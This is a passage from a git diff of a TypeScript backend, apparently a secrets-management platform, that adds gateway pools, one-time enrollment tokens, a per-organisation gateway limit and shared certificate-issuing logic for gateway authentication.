}); + } + throw error; + } + }; + + const removeGatewayFromPool = async ({ poolId, gatewayId, ...actor }: TRemoveGatewayFromPoolDTO) => { + await $checkPermission(actor, OrgPermissionGatewayPoolActions.EditGatewayPools); + await $checkLicense(actor.orgId); + + const pool = await gatewayPoolDAL.findById(poolId); + if (!pool || pool.orgId !== actor.orgId) { + throw new NotFoundError({ message: `Gateway pool with ID ${poolId} not found` }); + } + + const gateway = await gatewayV2DAL.findById(gatewayId); + if (!gateway || gateway.orgId !== actor.orgId) { + throw new NotFoundError({ message: `Gateway with ID ${gatewayId} not found` }); + } + + const [deleted] = await gatewayPoolMembershipDAL.delete({ gatewayPoolId: poolId, gatewayId }); + if (!deleted) { + throw new NotFoundError({ message: "Gateway is not a member of this pool." }); + } + + return { membership: deleted, poolName: pool.name, gatewayName: gateway.name }; + }; + + const pickRandomHealthyGateway = async (poolId: string) => { + const healthyGateways = await gatewayPoolMembershipDAL.findHealthyGatewaysByPoolId(poolId); + if (healthyGateways.length === 0) { + throw new BadRequestError({ + message: "Gateway pool has no healthy gateways." 
+ }); + } + const selected = healthyGateways[Math.floor(Math.random() * healthyGateways.length)]; + logger.info( + { poolId, selectedGatewayId: selected.id }, + `Pool gateway selection: picked gateway [gatewayId=${selected.id}] from pool [poolId=${poolId}]` + ); + return selected; + }; + + const getPlatformConnectionDetailsByPoolId = async ({ + poolId, + targetHost, + targetPort + }: TGetPlatformConnectionDetailsByPoolIdDTO): Promise => { + const pool = await gatewayPoolDAL.findById(poolId); + if (!pool) { + throw new NotFoundError({ message: `Gateway pool with ID ${poolId} not found` }); + } + + const selectedGateway = await pickRandomHealthyGateway(poolId); + + return gatewayV2Service.getPlatformConnectionDetailsByGatewayId({ + gatewayId: selectedGateway.id, + targetHost, + targetPort + }); + }; + + const getConnectedResources = async ({ poolId, ...actor }: TGetGatewayPoolByIdDTO) => { + await $checkPermission(actor, OrgPermissionGatewayPoolActions.ListGatewayPools); + await $checkLicense(actor.orgId); + + const pool = await gatewayPoolDAL.findById(poolId); + if (!pool || pool.orgId !== actor.orgId) { + throw new NotFoundError({ message: `Gateway pool with ID ${poolId} not found` }); + } + + // Add more DAL calls here as pool support expands to other consumers + const kubernetesAuths = await identityKubernetesAuthDAL.findByGatewayPoolId(poolId); + + return { kubernetesAuths }; + }; + + const getConnectedResourcesCount = async (poolId: string): Promise => { + // Add more DAL counts here as pool support expands to other consumers + const k8sAuthCount = await identityKubernetesAuthDAL.countByGatewayPoolId(poolId); + return k8sAuthCount; + }; + + return { + createGatewayPool, + listGatewayPools, + getGatewayPoolById, + updateGatewayPool, + deleteGatewayPool, + addGatewayToPool, + removeGatewayFromPool, + pickRandomHealthyGateway, + getPlatformConnectionDetailsByPoolId, + getConnectedResources, + getConnectedResourcesCount + }; +}; diff --git 
a/backend/src/ee/services/gateway-pool/gateway-pool-types.ts b/backend/src/ee/services/gateway-pool/gateway-pool-types.ts new file mode 100644 index 00000000000..d6fcf7dc7a5 --- /dev/null +++ b/backend/src/ee/services/gateway-pool/gateway-pool-types.ts @@ -0,0 +1,36 @@ +import { OrgServiceActor } from "@app/lib/types"; + +export type TCreateGatewayPoolDTO = { + name: string; +} & OrgServiceActor; + +export type TListGatewayPoolsDTO = OrgServiceActor; + +export type TGetGatewayPoolByIdDTO = { + poolId: string; +} & OrgServiceActor; + +export type TUpdateGatewayPoolDTO = { + poolId: string; + name?: string; +} & OrgServiceActor; + +export type TDeleteGatewayPoolDTO = { + poolId: string; +} & OrgServiceActor; + +export type TAddGatewayToPoolDTO = { + poolId: string; + gatewayId: string; +} & OrgServiceActor; + +export type TRemoveGatewayFromPoolDTO = { + poolId: string; + gatewayId: string; +} & OrgServiceActor; + +export type TGetPlatformConnectionDetailsByPoolIdDTO = { + poolId: string; + targetHost: string; + targetPort: number; +}; diff --git a/backend/src/ee/services/gateway-v2/gateway-enrollment-token-dal.ts b/backend/src/ee/services/gateway-v2/gateway-enrollment-token-dal.ts new file mode 100644 index 00000000000..18bbecc4515 --- /dev/null +++ b/backend/src/ee/services/gateway-v2/gateway-enrollment-token-dal.ts @@ -0,0 +1,9 @@ +import { TDbClient } from "@app/db"; +import { TableName } from "@app/db/schemas"; +import { ormify } from "@app/lib/knex"; + +export type TGatewayEnrollmentTokenDALFactory = ReturnType; + +export const gatewayEnrollmentTokenDALFactory = (db: TDbClient) => { + return ormify(db, TableName.GatewayEnrollmentTokens); +}; diff --git a/backend/src/ee/services/gateway-v2/gateway-v2-constants.ts b/backend/src/ee/services/gateway-v2/gateway-v2-constants.ts index 7e41de91c61..971c58bea30 100644 --- a/backend/src/ee/services/gateway-v2/gateway-v2-constants.ts +++ b/backend/src/ee/services/gateway-v2/gateway-v2-constants.ts @@ -1,3 +1,5 @@ +export 
const GATEWAY_HEARTBEAT_TIMEOUT_MS = 60 * 60 * 1000; // 1 hour + export const GATEWAY_ROUTING_INFO_OID = "1.3.6.1.4.1.12345.100.1"; export const GATEWAY_ACTOR_OID = "1.3.6.1.4.1.12345.100.2"; export const PAM_INFO_OID = "1.3.6.1.4.1.12345.100.3"; diff --git a/backend/src/ee/services/gateway-v2/gateway-v2-dal.ts b/backend/src/ee/services/gateway-v2/gateway-v2-dal.ts index a5534e0e3f2..9c03e50e1fa 100644 --- a/backend/src/ee/services/gateway-v2/gateway-v2-dal.ts +++ b/backend/src/ee/services/gateway-v2/gateway-v2-dal.ts @@ -22,7 +22,7 @@ export const gatewayV2DalFactory = (db: TDbClient) => { const query = (tx || db.replicaNode())(TableName.GatewayV2) // eslint-disable-next-line @typescript-eslint/no-misused-promises .where(buildFindFilter(regularFilter, TableName.GatewayV2)) - .join(TableName.Identity, `${TableName.Identity}.id`, `${TableName.GatewayV2}.identityId`) + .leftJoin(TableName.Identity, `${TableName.Identity}.id`, `${TableName.GatewayV2}.identityId`) .select(selectAllTableCols(TableName.GatewayV2)) .select(db.ref("name").withSchema(TableName.Identity).as("identityName")); @@ -54,7 +54,7 @@ export const gatewayV2DalFactory = (db: TDbClient) => { return docs.map((el) => ({ ...GatewaysV2Schema.parse(el), - identity: { id: el.identityId, name: el.identityName } + identity: el.identityId ? 
{ id: el.identityId, name: el.identityName } : null })); } catch (error) { throw new DatabaseError({ error, name: `${TableName.GatewayV2}: Find` }); @@ -76,5 +76,14 @@ export const gatewayV2DalFactory = (db: TDbClient) => { } }; - return { ...orm, find, findById }; + const countByOrgId = async (orgId: string, tx?: Knex) => { + try { + const result = await (tx || db.replicaNode())(TableName.GatewayV2).where({ orgId }).count("id").first(); + return parseInt(String(result?.count || "0"), 10); + } catch (error) { + throw new DatabaseError({ error, name: `${TableName.GatewayV2}: Count by org id` }); + } + }; + + return { ...orm, find, findById, countByOrgId }; }; diff --git a/backend/src/ee/services/gateway-v2/gateway-v2-service.ts b/backend/src/ee/services/gateway-v2/gateway-v2-service.ts index c1f8d81c743..ed2d525d14e 100644 --- a/backend/src/ee/services/gateway-v2/gateway-v2-service.ts +++ b/backend/src/ee/services/gateway-v2/gateway-v2-service.ts @@ -3,8 +3,9 @@ import net from "node:net"; import { ForbiddenError } from "@casl/ability"; import * as x509 from "@peculiar/x509"; -import { OrganizationActionScope, OrgMembershipRole, OrgMembershipStatus, TRelays } from "@app/db/schemas"; +import { OrganizationActionScope, OrgMembershipRole, OrgMembershipStatus, TableName, TRelays } from "@app/db/schemas"; import { PgSqlLock } from "@app/keystore/keystore"; +import { getConfig } from "@app/lib/config/env"; import { crypto } from "@app/lib/crypto"; import { DatabaseErrorCode } from "@app/lib/error-codes"; import { BadRequestError, DatabaseError, NotFoundError } from "@app/lib/errors"; @@ -14,7 +15,7 @@ import { withGatewayV2Proxy } from "@app/lib/gateway-v2/gateway-v2"; import { logger } from "@app/lib/logger"; import { OrgServiceActor } from "@app/lib/types"; import { TAppConnectionDALFactory } from "@app/services/app-connection/app-connection-dal"; -import { ActorAuthMethod, ActorType } from "@app/services/auth/auth-type"; +import { ActorAuthMethod, ActorType, 
AuthTokenType } from "@app/services/auth/auth-type"; import { constructPemChainFromCerts } from "@app/services/certificate/certificate-fns"; import { CertExtendedKeyUsage, CertKeyAlgorithm, CertKeyUsage } from "@app/services/certificate/certificate-types"; import { @@ -39,16 +40,21 @@ import { TPermissionServiceFactory } from "../permission/permission-service-type import { TPkiDiscoveryConfigDALFactory } from "../pki-discovery/pki-discovery-config-dal"; import { TRelayDALFactory } from "../relay/relay-dal"; import { TRelayServiceFactory } from "../relay/relay-service"; +import { TGatewayEnrollmentTokenDALFactory } from "./gateway-enrollment-token-dal"; import { GATEWAY_ACTOR_OID, GATEWAY_ROUTING_INFO_OID, PAM_INFO_OID } from "./gateway-v2-constants"; import { TGatewayV2DALFactory } from "./gateway-v2-dal"; import { GatewayHealthCheckStatus, TGatewayV2ConnectionDetails } from "./gateway-v2-types"; import { TOrgGatewayConfigV2DALFactory } from "./org-gateway-config-v2-dal"; +// Temporary limit until gateway limiting is implemented at the relay level +const MAX_GATEWAYS_PER_ORG = 50; + type TGatewayV2ServiceFactoryDep = { orgGatewayConfigV2DAL: Pick; kmsService: TKmsServiceFactory; relayService: TRelayServiceFactory; gatewayV2DAL: TGatewayV2DALFactory; + gatewayEnrollmentTokenDAL: TGatewayEnrollmentTokenDALFactory; relayDAL: TRelayDALFactory; permissionService: TPermissionServiceFactory; orgDAL: Pick; @@ -70,6 +76,7 @@ export const gatewayV2ServiceFactory = ({ kmsService, relayService, gatewayV2DAL, + gatewayEnrollmentTokenDAL, relayDAL, permissionService, orgDAL, @@ -82,6 +89,15 @@ export const gatewayV2ServiceFactory = ({ aiMcpServerDAL, pkiDiscoveryConfigDAL }: TGatewayV2ServiceFactoryDep) => { + const ENROLLMENT_TOKEN_TTL_SECONDS = 3600; + + const $generateEnrollmentToken = () => { + const plainToken = `gwe_${crypto.randomBytes(32).toString("base64url")}`; + const tokenHash = crypto.nativeCrypto.createHash("sha256").update(plainToken).digest("hex"); + const 
expiresAt = new Date(Date.now() + ENROLLMENT_TOKEN_TTL_SECONDS * 1000); + return { plainToken, tokenHash, expiresAt }; + }; + const $validateIdentityAccessToGateway = async (orgId: string, actorId: string, actorAuthMethod: ActorAuthMethod) => { const { permission } = await permissionService.getOrgPermission({ scope: OrganizationActionScope.Any, @@ -337,9 +353,27 @@ export const gatewayV2ServiceFactory = ({ countMap.set(id, (countMap.get(id) ?? 0) + count); } + // Check enrollment token status for each gateway + const allTokens = await gatewayEnrollmentTokenDAL.find({ orgId: orgPermission.orgId }); + const now = new Date(); + const tokenStatusMap = new Map(); + for (const token of allTokens) { + if (!token.usedAt && token.gatewayId) { + const isExpired = token.expiresAt <= now; + const current = tokenStatusMap.get(token.gatewayId); + // A non-expired token takes priority over an expired one + if (!isExpired) { + tokenStatusMap.set(token.gatewayId, "pending"); + } else if (!current) { + tokenStatusMap.set(token.gatewayId, "expired"); + } + } + } + return gateways.map((gateway) => ({ ...gateway, - connectedResourcesCount: countMap.get(gateway.id) ?? 0 + connectedResourcesCount: countMap.get(gateway.id) ?? 0, + enrollmentTokenStatus: tokenStatusMap.get(gateway.id) ?? 
null })); }; @@ -648,31 +682,152 @@ export const gatewayV2ServiceFactory = ({ }; }; + const $issueGatewayCerts = async ({ + orgId, + orgCAs, + relayName, + gateway + }: { + orgId: string; + orgCAs: Awaited>; + relayName: string; + gateway: { id: string; name: string }; + }) => { + const alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_2048); + const gatewayServerCaCert = new x509.X509Certificate(orgCAs.gatewayServerCaCertificate); + const rootGatewayCaCert = new x509.X509Certificate(orgCAs.rootGatewayCaCertificate); + const gatewayClientCaCert = new x509.X509Certificate(orgCAs.gatewayClientCaCertificate); + + const gatewayServerCaSkObj = crypto.nativeCrypto.createPrivateKey({ + key: orgCAs.gatewayServerCaPrivateKey, + format: "der", + type: "pkcs8" + }); + const gatewayServerCaPrivateKey = await crypto.nativeCrypto.subtle.importKey( + "pkcs8", + gatewayServerCaSkObj.export({ format: "der", type: "pkcs8" }), + alg, + true, + ["sign"] + ); + + const gatewayServerKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]); + const gatewayServerCertIssuedAt = new Date(); + const gatewayServerCertExpireAt = new Date(new Date().setDate(new Date().getDate() + 1)); + const gatewayServerCertPrivateKey = crypto.nativeCrypto.KeyObject.from(gatewayServerKeys.privateKey); + + const gatewayServerCertExtensions: x509.Extension[] = [ + new x509.BasicConstraintsExtension(false), + await x509.AuthorityKeyIdentifierExtension.create(gatewayServerCaCert, false), + await x509.SubjectKeyIdentifierExtension.create(gatewayServerKeys.publicKey), + new x509.CertificatePolicyExtension(["2.5.29.32.0"]), // anyPolicy + new x509.KeyUsagesExtension( + // eslint-disable-next-line no-bitwise + x509.KeyUsageFlags[CertKeyUsage.DIGITAL_SIGNATURE] | x509.KeyUsageFlags[CertKeyUsage.KEY_ENCIPHERMENT], + true + ), + new x509.ExtendedKeyUsageExtension([x509.ExtendedKeyUsage[CertExtendedKeyUsage.SERVER_AUTH]], true), + new x509.SubjectAlternativeNameExtension([ + { type: "dns", value: 
"localhost" }, + { type: "ip", value: "127.0.0.1" }, + { type: "ip", value: "::1" } + ]) + ]; + + const gatewayServerSerialNumber = createSerialNumber(); + const gatewayServerCertificate = await x509.X509CertificateGenerator.create({ + serialNumber: gatewayServerSerialNumber, + subject: `O=${orgId},CN=Gateway`, + issuer: gatewayServerCaCert.subject, + notBefore: gatewayServerCertIssuedAt, + notAfter: gatewayServerCertExpireAt, + signingKey: gatewayServerCaPrivateKey, + publicKey: gatewayServerKeys.publicKey, + signingAlgorithm: alg, + extensions: gatewayServerCertExtensions + }); + + const relayCredentials = await relayService.getCredentialsForGateway({ + relayName, + orgId, + gatewayId: gateway.id, + gatewayName: gateway.name + }); + + return { + gatewayId: gateway.id, + relayHost: relayCredentials.relayHost, + pki: { + serverCertificate: gatewayServerCertificate.toString("pem"), + serverPrivateKey: gatewayServerCertPrivateKey.export({ format: "pem", type: "pkcs8" }).toString(), + clientCertificateChain: constructPemChainFromCerts([gatewayClientCaCert, rootGatewayCaCert]) + }, + ssh: { + clientCertificate: relayCredentials.clientSshCert, + clientPrivateKey: relayCredentials.clientSshPrivateKey, + serverCAPublicKey: relayCredentials.serverCAPublicKey + } + }; + }; + const registerGateway = async ({ orgId, actorId, + actorType, actorAuthMethod, relayName, name }: { orgId: string; actorId: string; + actorType: ActorType; actorAuthMethod: ActorAuthMethod; - relayName: string; - name: string; + relayName?: string; + name?: string; }) => { - await $validateIdentityAccessToGateway(orgId, actorId, actorAuthMethod); const orgCAs = await $getOrgCAs(orgId); - let relay: TRelays = await relayDAL.findOne({ orgId, name: relayName }); - if (!relay) { - relay = await relayDAL.findOne({ name: relayName, orgId: null }); + // Enrollment-flow gateways authenticate with GATEWAY_ACCESS_TOKEN β€” the gateway row + // already exists, so we just look it up and issue fresh certs using its 
stored relay. + if (actorType === ActorType.GATEWAY) { + const gateway = await gatewayV2DAL.findById(actorId); + if (!gateway || gateway.orgId !== orgId) { + throw new NotFoundError({ message: `Gateway ${actorId} not found` }); + } + + let resolvedRelay: TRelays | undefined; + if (relayName) { + resolvedRelay = await relayDAL.findOne({ orgId, name: relayName }); + if (!resolvedRelay) resolvedRelay = await relayDAL.findOne({ name: relayName, orgId: null }); + if (!resolvedRelay) throw new NotFoundError({ message: `Relay ${relayName} not found` }); + + if (resolvedRelay.id !== gateway.relayId) { + await gatewayV2DAL.updateById(gateway.id, { relayId: resolvedRelay.id }); + } + } else { + if (!gateway.relayId) throw new NotFoundError({ message: "No relay associated with this gateway" }); + resolvedRelay = await relayDAL.findById(gateway.relayId); + if (!resolvedRelay) throw new NotFoundError({ message: "No relay associated with this gateway" }); + } + + return $issueGatewayCerts({ orgId, orgCAs, relayName: resolvedRelay.name, gateway }); + } + + // Identity-based flow: upsert the gateway row then issue certs. 
+ await $validateIdentityAccessToGateway(orgId, actorId, actorAuthMethod); + + if (!name) { + throw new BadRequestError({ message: "Gateway name is required" }); } - if (!relay) { - throw new NotFoundError({ message: `Relay ${relayName} not found` }); + if (!relayName) { + throw new BadRequestError({ message: "Relay name is required" }); } + let relay: TRelays = await relayDAL.findOne({ orgId, name: relayName }); + if (!relay) relay = await relayDAL.findOne({ name: relayName, orgId: null }); + if (!relay) throw new NotFoundError({ message: `Relay ${relayName} not found` }); + try { const [gateway] = await gatewayV2DAL.upsert( [ @@ -686,84 +841,10 @@ export const gatewayV2ServiceFactory = ({ ["identityId"] ); - const alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_2048); - const gatewayServerCaCert = new x509.X509Certificate(orgCAs.gatewayServerCaCertificate); - const rootGatewayCaCert = new x509.X509Certificate(orgCAs.rootGatewayCaCertificate); - const gatewayClientCaCert = new x509.X509Certificate(orgCAs.gatewayClientCaCertificate); - - const gatewayServerCaSkObj = crypto.nativeCrypto.createPrivateKey({ - key: orgCAs.gatewayServerCaPrivateKey, - format: "der", - type: "pkcs8" - }); - const gatewayServerCaPrivateKey = await crypto.nativeCrypto.subtle.importKey( - "pkcs8", - gatewayServerCaSkObj.export({ format: "der", type: "pkcs8" }), - alg, - true, - ["sign"] - ); - - const gatewayServerKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]); - const gatewayServerCertIssuedAt = new Date(); - const gatewayServerCertExpireAt = new Date(new Date().setDate(new Date().getDate() + 1)); - const gatewayServerCertPrivateKey = crypto.nativeCrypto.KeyObject.from(gatewayServerKeys.privateKey); - - const gatewayServerCertExtensions: x509.Extension[] = [ - new x509.BasicConstraintsExtension(false), - await x509.AuthorityKeyIdentifierExtension.create(gatewayServerCaCert, false), - await 
x509.SubjectKeyIdentifierExtension.create(gatewayServerKeys.publicKey), - new x509.CertificatePolicyExtension(["2.5.29.32.0"]), // anyPolicy - new x509.KeyUsagesExtension( - // eslint-disable-next-line no-bitwise - x509.KeyUsageFlags[CertKeyUsage.DIGITAL_SIGNATURE] | x509.KeyUsageFlags[CertKeyUsage.KEY_ENCIPHERMENT], - true - ), - new x509.ExtendedKeyUsageExtension([x509.ExtendedKeyUsage[CertExtendedKeyUsage.SERVER_AUTH]], true), - new x509.SubjectAlternativeNameExtension([ - { type: "dns", value: "localhost" }, - { type: "ip", value: "127.0.0.1" }, - { type: "ip", value: "::1" } - ]) - ]; - - const gatewayServerSerialNumber = createSerialNumber(); - const gatewayServerCertificate = await x509.X509CertificateGenerator.create({ - serialNumber: gatewayServerSerialNumber, - subject: `O=${orgId},CN=Gateway`, - issuer: gatewayServerCaCert.subject, - notBefore: gatewayServerCertIssuedAt, - notAfter: gatewayServerCertExpireAt, - signingKey: gatewayServerCaPrivateKey, - publicKey: gatewayServerKeys.publicKey, - signingAlgorithm: alg, - extensions: gatewayServerCertExtensions - }); - - const relayCredentials = await relayService.getCredentialsForGateway({ - relayName, - orgId, - gatewayId: gateway.id, - gatewayName: gateway.name - }); - - return { - gatewayId: gateway.id, - relayHost: relayCredentials.relayHost, - pki: { - serverCertificate: gatewayServerCertificate.toString("pem"), - serverPrivateKey: gatewayServerCertPrivateKey.export({ format: "pem", type: "pkcs8" }).toString(), - clientCertificateChain: constructPemChainFromCerts([gatewayClientCaCert, rootGatewayCaCert]) - }, - ssh: { - clientCertificate: relayCredentials.clientSshCert, - clientPrivateKey: relayCredentials.clientSshPrivateKey, - serverCAPublicKey: relayCredentials.serverCAPublicKey - } - }; + return await $issueGatewayCerts({ orgId, orgCAs, relayName, gateway }); } catch (err) { if (err instanceof DatabaseError && (err.error as { code: string })?.code === DatabaseErrorCode.UniqueViolation) { - throw new 
BadRequestError({ message: `Gateway with name "${name}" already exists` }); + throw new BadRequestError({ message: "A gateway with this name already exists" }); } throw err; @@ -888,6 +969,15 @@ export const gatewayV2ServiceFactory = ({ }; const heartbeat = async ({ orgPermission }: { orgPermission: OrgServiceActor }) => { + if (orgPermission.type === ActorType.GATEWAY) { + const gateway = await gatewayV2DAL.findById(orgPermission.id); + if (!gateway || gateway.orgId !== orgPermission.orgId) { + throw new NotFoundError({ message: `Gateway ${orgPermission.id} not found.` }); + } + await $checkGatewayHealth(gateway.id); + return; + } + await $validateIdentityAccessToGateway(orgPermission.orgId, orgPermission.id, orgPermission.authMethod); const gateway = await gatewayV2DAL.findOne({ @@ -939,25 +1029,26 @@ export const gatewayV2ServiceFactory = ({ }; const getPamSessionKey = async ({ orgPermission }: { orgPermission: OrgServiceActor }) => { - const { permission } = await permissionService.getOrgPermission({ - actor: orgPermission.type, - actorId: orgPermission.id, - orgId: orgPermission.orgId, - actorAuthMethod: orgPermission.authMethod, - actorOrgId: orgPermission.orgId, - scope: OrganizationActionScope.Any - }); + // Gateway actors are already authenticated via GATEWAY_ACCESS_TOKEN JWT β€” skip org permission check. 
+ if (orgPermission.type !== ActorType.GATEWAY) { + const { permission } = await permissionService.getOrgPermission({ + actor: orgPermission.type, + actorId: orgPermission.id, + orgId: orgPermission.orgId, + actorAuthMethod: orgPermission.authMethod, + actorOrgId: orgPermission.orgId, + scope: OrganizationActionScope.Any + }); - ForbiddenError.from(permission).throwUnlessCan( - OrgPermissionGatewayActions.CreateGateways, - OrgPermissionSubjects.Gateway - ); + ForbiddenError.from(permission).throwUnlessCan( + OrgPermissionGatewayActions.CreateGateways, + OrgPermissionSubjects.Gateway + ); + } return gatewayV2DAL.transaction(async (tx) => { const gateway = await gatewayV2DAL.findOne( - { - identityId: orgPermission.id - }, + orgPermission.type === ActorType.GATEWAY ? { id: orgPermission.id } : { identityId: orgPermission.id }, tx ); @@ -1098,6 +1189,224 @@ export const gatewayV2ServiceFactory = ({ }; }; + const getGatewayById = async ({ gatewayId }: { gatewayId: string }) => { + const gateway = await gatewayV2DAL.findById(gatewayId); + if (!gateway) { + throw new NotFoundError({ message: `Gateway ${gatewayId} not found` }); + } + return gateway; + }; + + // --- V3 service methods --- + + const createGateway = async ({ + orgId, + actorId, + actorType, + actorAuthMethod, + name + }: { + orgId: string; + actorId: string; + actorType: ActorType; + actorAuthMethod: ActorAuthMethod; + name: string; + }) => { + const { permission } = await permissionService.getOrgPermission({ + actor: actorType, + actorId, + orgId, + actorAuthMethod, + actorOrgId: orgId, + scope: OrganizationActionScope.Any + }); + + ForbiddenError.from(permission).throwUnlessCan( + OrgPermissionGatewayActions.CreateGateways, + OrgPermissionSubjects.Gateway + ); + + const gateway = await gatewayV2DAL.transaction(async (tx) => { + // eslint-disable-next-line @typescript-eslint/no-unsafe-call + await tx.raw("SELECT pg_advisory_xact_lock(?)", [PgSqlLock.CreateGateway(orgId)]); + + // eslint-disable-next-line 
@typescript-eslint/no-unsafe-call, @typescript-eslint/no-unsafe-assignment + const existingGatewayCount = await gatewayV2DAL.countByOrgId(orgId, tx); + if (existingGatewayCount >= MAX_GATEWAYS_PER_ORG) { + throw new BadRequestError({ + message: `Organization has reached the maximum limit of ${MAX_GATEWAYS_PER_ORG} gateways` + }); + } + + try { + return await gatewayV2DAL.create({ orgId, name }, tx); + } catch (err) { + if ( + err instanceof DatabaseError && + (err.error as { code: string })?.code === DatabaseErrorCode.UniqueViolation + ) { + throw new BadRequestError({ message: `A gateway named "${name}" already exists` }); + } + throw err; + } + }); + + return gateway; + }; + + const configureTokenAuth = async ({ + orgPermission, + gatewayId + }: { + orgPermission: OrgServiceActor; + gatewayId: string; + }) => { + const { permission } = await permissionService.getOrgPermission({ + actor: orgPermission.type, + actorId: orgPermission.id, + orgId: orgPermission.orgId, + actorAuthMethod: orgPermission.authMethod, + actorOrgId: orgPermission.orgId, + scope: OrganizationActionScope.Any + }); + + ForbiddenError.from(permission).throwUnlessCan( + OrgPermissionGatewayActions.EditGateways, + OrgPermissionSubjects.Gateway + ); + + const gateway = await gatewayV2DAL.findById(gatewayId); + if (!gateway || gateway.orgId !== orgPermission.orgId) { + throw new NotFoundError({ message: `Gateway ${gatewayId} not found` }); + } + + if (gateway.identityId) { + throw new BadRequestError({ message: "Cannot configure token auth for identity-based gateways" }); + } + + const gatewayToken = $generateEnrollmentToken(); + + const record = await gatewayEnrollmentTokenDAL.transaction(async (tx) => { + // Delete any existing unused enrollment tokens for this gateway + const existingTokens = await gatewayEnrollmentTokenDAL.find({ gatewayId }, { tx }); + const unusedTokenIds = existingTokens.filter((t) => !t.usedAt).map((t) => t.id); + if (unusedTokenIds.length > 0) { + await 
gatewayEnrollmentTokenDAL.delete({ $in: { id: unusedTokenIds } }, tx); + } + + return gatewayEnrollmentTokenDAL.create( + { + orgId: orgPermission.orgId, + tokenHash: gatewayToken.tokenHash, + ttl: ENROLLMENT_TOKEN_TTL_SECONDS, + expiresAt: gatewayToken.expiresAt, + gatewayId + }, + tx + ); + }); + + return { ...record, token: gatewayToken.plainToken, gatewayName: gateway.name }; + }; + + const connectGateway = async ({ + orgId, + actorId, + actorType, + relayName + }: { + orgId: string; + actorId: string; + actorType: ActorType; + relayName?: string; + }) => { + const orgCAs = await $getOrgCAs(orgId); + + if (actorType === ActorType.GATEWAY) { + const gateway = await gatewayV2DAL.findById(actorId); + if (!gateway || gateway.orgId !== orgId) { + throw new NotFoundError({ message: `Gateway ${actorId} not found` }); + } + + let resolvedRelay: TRelays | undefined; + if (relayName) { + resolvedRelay = await relayDAL.findOne({ orgId, name: relayName }); + if (!resolvedRelay) resolvedRelay = await relayDAL.findOne({ name: relayName, orgId: null }); + if (!resolvedRelay) throw new NotFoundError({ message: `Relay ${relayName} not found` }); + + // Persist the relay change so future restarts use the new relay + if (resolvedRelay.id !== gateway.relayId) { + await gatewayV2DAL.updateById(gateway.id, { relayId: resolvedRelay.id }); + } + } else { + if (!gateway.relayId) throw new NotFoundError({ message: "No relay associated with this gateway" }); + resolvedRelay = await relayDAL.findById(gateway.relayId); + if (!resolvedRelay) throw new NotFoundError({ message: "No relay associated with this gateway" }); + } + + return $issueGatewayCerts({ orgId, orgCAs, relayName: resolvedRelay.name, gateway }); + } + + throw new BadRequestError({ message: "Invalid actor type for gateway connect" }); + }; + + const enrollGateway = async ({ token }: { token: string }) => { + const tokenHash = crypto.nativeCrypto.createHash("sha256").update(token).digest("hex"); + + const tokenRecord = await 
gatewayEnrollmentTokenDAL.findOne({ tokenHash }); + if (!tokenRecord) { + throw new BadRequestError({ message: "Invalid enrollment token" }); + } + + if (tokenRecord.expiresAt < new Date()) { + throw new BadRequestError({ message: "Enrollment token has expired" }); + } + + if (!tokenRecord.gatewayId) { + throw new BadRequestError({ message: "Enrollment token is not linked to a gateway" }); + } + + const { orgId } = tokenRecord; + + // Consume the token and bump tokenVersion in a single transaction. + const gateway = await gatewayEnrollmentTokenDAL.transaction(async (tx) => { + const rows = await tx(TableName.GatewayEnrollmentTokens) + .where({ id: tokenRecord.id }) + .whereNull("usedAt") + .update({ usedAt: new Date() }) + .returning("*"); + if (rows.length === 0) { + throw new BadRequestError({ message: "Enrollment token has already been used" }); + } + + const existing = await gatewayV2DAL.findById(tokenRecord.gatewayId!, tx); + if (!existing) throw new NotFoundError({ message: `Gateway ${tokenRecord.gatewayId} not found` }); + return gatewayV2DAL.updateById( + existing.id, + { $incr: { tokenVersion: 1 }, heartbeat: null, lastHealthCheckStatus: null }, + tx + ); + }); + + const appCfg = getConfig(); + const accessToken = crypto.jwt().sign( + { + gatewayId: gateway.id, + orgId, + authTokenType: AuthTokenType.GATEWAY_ACCESS_TOKEN, + tokenVersion: gateway.tokenVersion + }, + appCfg.AUTH_SECRET + ); + + return { + accessToken, + gatewayId: gateway.id, + gatewayName: gateway.name, + orgId + }; + }; + return { listGateways, registerGateway, @@ -1108,6 +1417,12 @@ export const gatewayV2ServiceFactory = ({ triggerHeartbeat, getPamSessionKey, healthcheckNotify, - getConnectedResources + getConnectedResources, + getGatewayById, + enrollGateway, + // V3 + createGateway, + configureTokenAuth, + connectGateway }; }; diff --git a/backend/src/ee/services/gateway/gateway-service.ts b/backend/src/ee/services/gateway/gateway-service.ts index 54be2e7146f..069d3bfb4fc 100644 --- 
a/backend/src/ee/services/gateway/gateway-service.ts +++ b/backend/src/ee/services/gateway/gateway-service.ts @@ -3,7 +3,7 @@ import * as x509 from "@peculiar/x509"; import { z } from "zod"; import { OrganizationActionScope } from "@app/db/schemas"; -import { KeyStorePrefixes, PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore"; import { getConfig } from "@app/lib/config/env"; import { crypto } from "@app/lib/crypto/cryptography"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; @@ -85,8 +85,6 @@ export const gatewayServiceFactory = ({ }; const getGatewayRelayDetails = async (actorId: string, actorOrgId: string, actorAuthMethod: ActorAuthMethod) => { - const TURN_CRED_EXPIRY = 10 * 60; // 10 minutes - const envCfg = getConfig(); await $validateOrgAccessToGateway(actorOrgId, actorId, actorAuthMethod); const { encryptor, decryptor } = await kmsService.createCipherPairWithDataKey({ @@ -114,7 +112,7 @@ export const gatewayServiceFactory = ({ const el = getTurnCredentials(actorId, envCfg.GATEWAY_RELAY_AUTH_SECRET); await keyStore.setItemWithExpiry( KeyStorePrefixes.GatewayIdentityCredential(actorId), - TURN_CRED_EXPIRY, + KeyStoreTtls.GatewayRelayCredentialInSeconds, encryptor({ plainText: Buffer.from(JSON.stringify({ username: el.username, password: el.password })) }).cipherTextBlob.toString("hex") diff --git a/backend/src/ee/services/group/group-fns.ts b/backend/src/ee/services/group/group-fns.ts index c9d527b59c7..208165c87c2 100644 --- a/backend/src/ee/services/group/group-fns.ts +++ b/backend/src/ee/services/group/group-fns.ts @@ -34,7 +34,7 @@ const addAcceptedUsersToGroup = async ({ await userGroupMembershipDAL.insertMany( users.map((user) => ({ - userId: 